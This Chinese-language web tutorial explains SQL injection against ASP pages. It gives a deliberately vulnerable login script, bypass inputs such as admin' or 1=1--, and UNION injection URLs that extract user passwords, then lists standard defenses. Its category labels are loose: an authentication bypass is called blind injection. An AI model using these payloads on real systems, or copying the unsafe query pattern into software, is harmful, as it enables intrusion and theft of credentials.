ASP+PHP标准SQL注入攻略
SQL注入是一种常见的Web应用程序安全漏洞,黑客可以通过SQL注入攻击获取目标网站的数据,进而构造更高级的攻击。下面是ASP+PHP标准SQL注入语句的攻略。
一、概述
SQL注入是通过Web应用程序的输入页面往后台发送恶意SQL语句,从而导致数据库被攻击者控制的过程。
黑客通常使用特定结构的字符串来通过应用程序获取敏感信息或执行任意SQL语句。这些字符串称为恶意SQL语句,有时也称为病毒注入、恶意注入等。
二、漏洞类型
在ASP+PHP开发中,有以下4种常见的SQL注入漏洞:
- 盲注式SQL注入漏洞
- UNION注入漏洞
- 布尔盲注漏洞
- 报错注入漏洞
三、漏洞示例
下面分别通过两个示例来介绍ASP+PHP标准SQL注入语句的攻略。
示例一:盲注式SQL注入漏洞
我们假设有一个ASP网站,包含以下代码:
<%
dim name,password
name = trim(request.form("username"))
password = trim(request.form("password"))
set rs = server.createobject("ADODB.recordset")
sql = "select * from users where name = '" & name & "' and password = '" & password & "'"
rs.open sql, conn, 1, 1
if not rs.eof then
response.write "登录成功!"
else
response.write "登录失败,请重试!"
end if
%>
可以发现,在执行SQL语句时,用户名和密码都没有做任何过滤。这就造成了一个安全隐患,攻击者可以通过构造特意的用户名和密码实现SQL注入攻击。
黑客可以通过构造以下用户名和密码达到注入攻击的目的:
Username: admin' --
Password: xxx
这里的--代表注释掉SQL语句的后续内容,即将整条SQL语句的后面部分注释掉。假如攻击者的用户名和密码输入了以上内容,构造的SQL语句会变成:
select * from users where name = 'admin' --' and password = 'xxx'
这时,SQL语句中的'--'及后续部分都被注释了掉,它表示"我后面的所有内容你都别看了"。
注入攻击剩下的内容就用or代替原来的and就可以了,如:
Username: admin' or 1=1--
Password: xxx
这个注入语句就是"where name='admin' or 1=1-- ' and password='xxx'",这句话成立的原因是or 1=1始终为真,即所有记录都被查到了。攻击者可以使用任何语句将恶意注入继续扩展,比如加入update、delete等语句,从而对数据进行改动。
示例二:UNION注入漏洞
我们现在来看一个更加复杂的例子,也是一种更加高级的攻击方式:UNION注入。
继续使用以上代码示例,在其基础上加入以下语句:
Dim sql2
sql2 = "select * from orders where user_id='" & request.QueryString("id") & "'"
set rs2 = conn.execute(sql2)
当用户访问网站时,访问以下URL:
http://localhost/test.asp?id=2%20union%20select%201,2,3,4--
就可以得到如下信息:
1 2 3 4
1 1 23 1
1 2 34 2
黑客攻击的目的就是获取敏感信息,他可以将其中一列改成所需的信息获取数据,如:
http://localhost/test.asp?id=2%20union%20select%201,2,password,4%20from%20users--
这样,黑客就能够通过这个SQL语句,获取到所有用户的密码信息。
四、防范措施
为了防御SQL注入攻击,我们可以采取以下几种措施:
- 在开发过程中,验证所有用户输入的数据,只允许合法内容的输入。
- 对输入的数据进行过滤、编码处理、白名单等机制的限制,以防止攻击者输入注入代码。
- 采用预编译语句、存储过程等方式,有效避免SQL注入漏洞。
- 只授权给应用程序需要操作的数据库对象的最低权限,在必要时,使用防火墙、入侵检测和安全审计等工具加强web应用程序的安全防御。
以上组合应该能大幅降低SQL注入攻击的出现机率。
本站文章如无特殊说明,均为本站原创,如若转载,请注明出处:ASP+PHP 标准sql注入语句(完整版) - Python技术站
微信扫一扫 
支付宝扫一扫 